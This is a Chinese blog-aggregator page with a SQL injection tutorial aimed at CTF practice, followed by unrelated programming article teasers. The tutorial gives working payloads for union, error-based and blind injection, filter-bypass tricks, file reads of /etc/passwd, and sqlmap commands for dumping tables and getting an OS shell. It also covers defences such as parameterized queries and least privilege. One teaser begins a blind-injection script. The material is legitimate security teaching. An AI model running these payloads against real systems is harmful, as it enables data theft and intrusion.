当前位置：首页 > news >正文

SQL注入（SQL Injection）详解与实战

news 2026/2/9 19:49:39

文章目录

- 一、什么是SQL注入？
- 二、常见SQL注入类型
- 三、手动注入步骤（以CTF题目为例）
- 四、CTF实战技巧
- 五、自动化工具：SQLMap
- 六、防御措施
- 七、CTF例题
- 八、资源推荐

一、什么是SQL注入？

SQL注入是一种通过用户输入构造恶意SQL语句，干扰后端数据库查询逻辑的攻击方式。攻击者可通过注入获取敏感数据、篡改数据库或执行系统命令。

二、常见SQL注入类型

联合查询注入（Union-Based）
利用UNION SELECT拼接查询结果，直接回显数据。

' UNION SELECT username, password FROM users--
报错注入（Error-Based）
通过触发数据库报错泄露信息（如MySQL的updatexml或extractvalue）。

' AND updatexml(1, concat(0x7e, (SELECT user())), 1)--
布尔盲注（Boolean-Based Blind）
通过页面返回的真假状态推断数据（如返回内容差异或HTTP状态码）。

' AND (SELECT SUBSTR(password,1,1) FROM users WHERE id=1)='a'--
时间盲注（Time-Based Blind）
通过延时响应判断条件是否成立（如MySQL的sleep()）。

' AND IF(1=1, SLEEP(5), 0)--

三、手动注入步骤（以CTF题目为例）

检测注入点
- 输入单引号'触发数据库错误（如You have an error in your SQL syntax）。
- 测试逻辑条件：
  
  id=1' AND 1=1-- （页面正常） id=1' AND 1=2-- （页面异常）
确定字段数（ORDER BY）

' ORDER BY 3-- （无报错） ' ORDER BY 4-- （报错→字段数为3）
联合查询获取数据

' UNION SELECT 1,2,3-- （确定回显位） ' UNION SELECT database(), user(), version()--
提取表名与列名

' UNION SELECT 1, group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema=database()-- ' UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_name='users'--
获取敏感数据

' UNION SELECT 1, username, password FROM users--

四、CTF实战技巧

绕过过滤
- 大小写绕过：UnIoN SeLeCt（部分过滤器不区分大小写）。
- 注释符：-- （空格）、#、/*...*/。
- 编码绕过：URL编码（%27代替'）、十六进制（0x...）。
- 空格绕过：用/**/或+代替空格（如UNION/**/SELECT）。
利用字符串拼接
- MySQL：'||'1'='1' → ' OR '1'='1。
- SQLite：'||1=1-- 。
利用数据库特性
- MySQL：LOAD_FILE('/etc/passwd')读取文件。
- PostgreSQL：pg_read_file('/etc/passwd')。
- SQLite：sqlite_version()获取版本。

五、自动化工具：SQLMap

基本用法

sqlmap -u "http://target.com/page?id=1" --dbs # 获取所有数据库名 sqlmap -u "http://target.com/page?id=1" -D dbname --tables # 获取表名 sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump # 导出数据
高级参数
- --level=3：提高检测等级（包含Cookie注入）。
- --risk=3：允许高风险操作（如文件写入）。
- --os-shell：尝试获取系统Shell（需高权限）。

六、防御措施

参数化查询（预编译）

Python

# Python示例（使用SQLAlchemy） result = db.session.execute('SELECT * FROM users WHERE id = :id', {'id': user_id})
输入过滤
- 过滤特殊字符（' " ; --）。
- 限制输入类型（如数字类型强制转换为整数）。
最小权限原则
- 数据库用户仅授予必要权限（禁止FILE、EXECUTE等）。

七、CTF例题

题目：登录页面存在SQL注入，获取管理员密码。

SQL

' OR 1=1 -- ' UNION SELECT null, password FROM users WHERE username='admin'--
题目：过滤了空格和UNION，利用盲注获取数据。

SQL

'||(SELECT CASE WHEN (SUBSTR(password,1,1)='a') THEN SLEEP(5) ELSE 0 END FROM users)#

八、资源推荐

练习平台：
- PortSwigger SQLi Labs（https://portswigger.net/web-security/sql-injection）
- SQLi Labs（GitHub开源靶场）
深入阅读：
- 《SQL注入攻击与防御（第2版）》
- OWASP SQL Injection Cheat Sheet

SQL注入（SQL Injection）详解与实战

文章目录一、什么是SQL注入？二、常见SQL注入类型三、手动注入步骤（以CTF题目为例）四、CTF实战技巧五、自动化工具：SQLMap六、防御措施七、CTF例题八、资源推荐一、什么是SQL注入？ SQL注入是一种通过用户输入构造恶意…...

编程日记 2025/2/18 16:43:22

【Prometheus】prometheus结合domain_exporter实现域名监控

✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯，先赞后看哦~🎈🎈 🏆 作者简介：景天科技苑 🏆《头衔》：大厂架构师，华为云开发者社区专家博主，阿里云开发者社区专家博主，CSDN全栈领域优质创作者，掘金优秀博主，51CTO博客专家等。 🏆《博客》：Python全…...

编程日记 2025/2/18 16:42:20

Java 设计模式之命令模式

文章目录 Java 设计模式之命令模式概述UML代码实现简单实现复杂实现 Java 设计模式之命令模式概述命令模式(Command)：将一个请求封装为一个对象，从而使你可用不同的请求对客户进行参数化；对请求排队或记录请求日志，以及支持可…...

编程日记 2025/2/18 16:41:16

BT401双模音频蓝牙模块如何开启ble的透传,有什么注意事项

BT401音频蓝牙模块如何开启ble的透传？ 首先BT401的蓝牙音频模块，分为两个版本，dac版本和iis数字音频版本 DAC版本：就是BT401蓝牙模块【9和10脚】直接输出模拟音频信号，也就是说，直接推动耳机可以听到声音 …...

编程日记 2025/2/18 16:39:13

一、布尔盲注： import requestsdef binary_search_character(url, query, index, low32, high127):while low < high:mid (low high 1) // 2payload f"1 AND ASCII(SUBSTRING(({query}),{index},1)) > {mid} -- "res {"id": payloa…...

编程日记 2025/2/18 16:37:10

Vue 项目登录的基本流程

Vue 用户登录的基本流程包括以下6个步骤： 步骤： 1. 创建登录表单在前端，首先要创建一个登录表单，用户输入账号（用户名、邮箱、手机号等）和密码。示例：Login.vue <template><div…...

编程日记 2025/2/18 16:34:04

kubernetes源码分析 kubelet

简介从官方的架构图中很容易就能找到 kubelet 执行 kubelet -h 看到 kubelet 的功能介绍： kubelet 是每个 Node 节点上都运行的主要“节点代理”。使用如下的一个向 apiserver 注册 Node 节点：主机的 hostname；覆盖 host 的参数&#xff1…...

编程日记 2025/2/18 16:27:53

Web3 开发者周刊 36 | 构建自主未来：Agent、可扩展性与赏金

欢迎来到 Web3 开发者周刊 36，这里汇聚了赋能您的 Web3 构建之旅的各种资源。本周我们将剖析基于Agent的系统，讨论来自 Vitalik 关于以太坊 L1 和 L2 的最新思考，并提供最新高价值Bounty消息。开始Build吧！ ✅ One Trillion Age…...

编程日记 2025/2/18 16:24:48

零基础入门机器学习 -- 第十一章机器学习模型的评估与优化

如何判断你的模型到底行不行？ 11.1 为什么需要评估模型？ 场景设定：信用卡欺诈检测想象你是ABC银行的风控经理，你每天的工作就是盯着上百万笔交易，防止客户的信用卡被盗刷。你们银行新推出了一款机器学习模型&…...

编程日记 2025/2/18 16:18:38

菜鸟之路Day15一一IO流(一)

菜鸟之路Day15一一IO流（一） 作者：blue 时间：2025.2.8 文章目录菜鸟之路Day15一一IO流（一）0.概述1.初识IO流1.1.什么是IO流？1.2.IO流的作用1.3.IO流的分类 2.IO流的体系结构3.字节输出流的基本…...

编程日记 2025/2/18 16:14:28

动手学Agent——Day2

文章目录一、用 Llama-index 创建 Agent1. 测试模型2. 自定义一个接口类3. 使用 ReActAgent & FunctionTool 构建 Agent 二、数据库对话 Agent1. SQLite 数据库1.1 创建数据库 & 连接1.2 创建、插入、查询、更新、删除数据1.3 关闭连接建立数据库 2. ollama3. 配置对话…...

编程日记 2025/2/18 16:08:11

JSONObject,TreeUtil,EagelMap,BeanUtil使用

目录 JSONObject的使用 TreeUtil的使用 EagleMap使用安装 application.yml配置 springboot导入依赖配置信息简单使用如果想获取这个json字符串里面的distance的值 BeanUtil拷贝注意 JSONObject的使用假如我现在要处理这样的json数据可以直接使用JSONUtil.parseObj…...

编程日记 2025/2/18 15:59:59

Unity嵌入到Winform

Unity嵌入到Winform Winform工程🌈...

编程日记 2025/2/18 15:56:55

TCP/UDP协议与OSI七层模型的关系解析| HTTPS与HTTP安全性深度思考》

目录 OSI 7层模型每一层包含的协议： TCP和UDP协议： TCP (Transmission Control Protocol)： UDP (User Datagram Protocol)： 数据包流程图 TCP与UDP的区别： 传输层与应用层的关联传输层和应用层的关联&#xf…...

编程日记 2025/2/18 15:55:50

《Zookeeper 分布式过程协同技术详解》读书笔记-2

目录 zk的一些内部原理和应用请求，事务和标识读写操作事务标识（zxid） 群首选举Zab协议（ZooKeeper Atomic Broadcast protocol）文件系统和监听通知机制分布式配置中心, 简单Demojava code 集群管理code 分布式锁 zk的一…...

编程日记 2025/2/18 15:53:46

缺陷检测之图片标注工具--labme

一、labelme简介 Labelme是开源的图像标注工具，常用做检测，分割和分类任务的图像标注。它的功能很多，包括： 对图像进行多边形，矩形，圆形，多段线，线段，点形式的标注&a…...

编程日记 2025/2/18 15:51:41

机器学习_13 决策树知识总结

决策树是一种直观且强大的机器学习算法，广泛应用于分类和回归任务。它通过树状结构的决策规则来建模数据，易于理解和解释。今天，我们就来深入探讨决策树的原理、实现和应用。一、决策树的基本概念 1.1 决策树的工作原理决策树是一种基于…...

编程日记 2025/2/18 15:49:33

请解释一下Standford Alpaca格式、sharegpt数据格式-------deepseek问答记录

1 Standford Alpaca格式 json格式数据。Stanford Alpaca 格式是一种用于训练和评估自然语言处理（NLP）模型的数据格式，特别是在指令跟随任务中。它由斯坦福大学的研究团队开发，旨在帮助模型理解和执行自然语言指令。以下是该格式的…...

编程日记 2025/2/18 15:47:22

ubuntu 安装管理多版本python3 相关问题解决

背景：使用ubuntu 22.04 默认python 未3.10.编译一些模块的时候发现需要降级到python3.9.于是下载安装下载： wget https://www.python.org/ftp/python/3.9.16/Python-3.9.16.tgz解压与编译 tar -xf Python-3.9.16.tgz cd Python-3.9.16 ./configure -…...

编程日记 2025/2/18 15:46:19

滑动窗口算法篇：连续子区间与子串问题

1.滑动窗口原理那么一谈到子区间的问题，我们可能会想到我们可以用我们的前缀和来应用子区间问题，但是这里对于子区间乃至子串问题，我们也可以尝试往滑动窗口的思路方向去进行一个尝试，那么说那么半天，滑动窗口是什么…...

编程日记 2025/2/18 15:39:03

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目：3442. 奇偶频次间的最大差值 I 思路 ：哈希，时间复杂度0(n)。用哈希表来记录每个字符串中字符的分布情况，哈希表这里用数组即可实现。 C版本： class Solution { public:int maxDifference(string s) {int a[26]…...

编程新知 2026/2/7 23:18:31

【大模型RAG】Docker 一键部署 Milvus 完整攻略

本文概要 Milvus 2.5 Stand-alone 版可通过 Docker 在几分钟内完成安装；只需暴露 19530（gRPC）与 9091（HTTP/WebUI）两个端口，即可让本地电脑通过 PyMilvus 或浏览器访问远程 Linux 服务器上的 Milvus。下面…...

编程新知 2026/1/31 8:08:07

12.找到字符串中所有字母异位词

🧠 题目解析题目描述： 给定两个字符串 s 和 p，找出 s 中所有 p 的字母异位词的起始索引。返回的答案以数组形式表示。字母异位词定义： 若两个字符串包含的字符种类和出现次数完全相同，顺序无所谓，则互为…...

编程新知 2026/1/31 12:52:29

（转）什么是DockerCompose?它有什么作用？

一、什么是DockerCompose? DockerCompose可以基于Compose文件帮我们快速的部署分布式应用，而无需手动一个个创建和运行容器。 Compose文件是一个文本文件，通过指令定义集群中的每个容器如何运行。 DockerCompose就是把DockerFile转换成指令去运行。 …...

编程新知 2026/1/31 22:59:12

vue3+vite项目中使用.env文件环境变量方法

vue3vite项目中使用.env文件环境变量方法 .env文件作用命名规则常用的配置项示例使用方法注意事项在vite.config.js文件中读取环境变量方法 .env文件作用 .env 文件用于定义环境变量，这些变量可以在项目中通过 import.meta.env 进行访问。Vite 会自动加载这些环境变…...

编程新知 2026/1/26 19:12:01

return this；返回的是谁

一个审批系统的示例来演示责任链模式的实现。假设公司需要处理不同金额的采购申请，不同级别的经理有不同的审批权限： // 抽象处理者：审批者 abstract class Approver {protected Approver successor; // 下一个处理者// 设置下一个处理者pub…...

编程新知 2026/1/28 21:45:43

安全突围：重塑内生安全体系：齐向东在2025年BCS大会的演讲

文章目录前言第一部分：体系力量是突围之钥第一重困境是体系思想落地不畅。第二重困境是大小体系融合瓶颈。第三重困境是“小体系”运营梗阻。第二部分：体系矛盾是突围之障一是数据孤岛的障碍。二是投入不足的障碍。三是新旧兼容难的障碍。第三部分&am…...

编程新知 2026/1/25 2:04:42

ArcGIS Pro+ArcGIS给你的地图加上北回归线！

今天来看ArcGIS Pro和ArcGIS中如何给制作的中国地图或者其他大范围地图加上北回归线。我们将在ArcGIS Pro和ArcGIS中一同介绍。 1 ArcGIS Pro中设置北回归线 1、在ArcGIS Pro中初步设置好经纬格网等，设置经线、纬线都以10间隔显示。 2、需要插入背会归线&#xf…...

编程新知 2026/2/1 12:04:40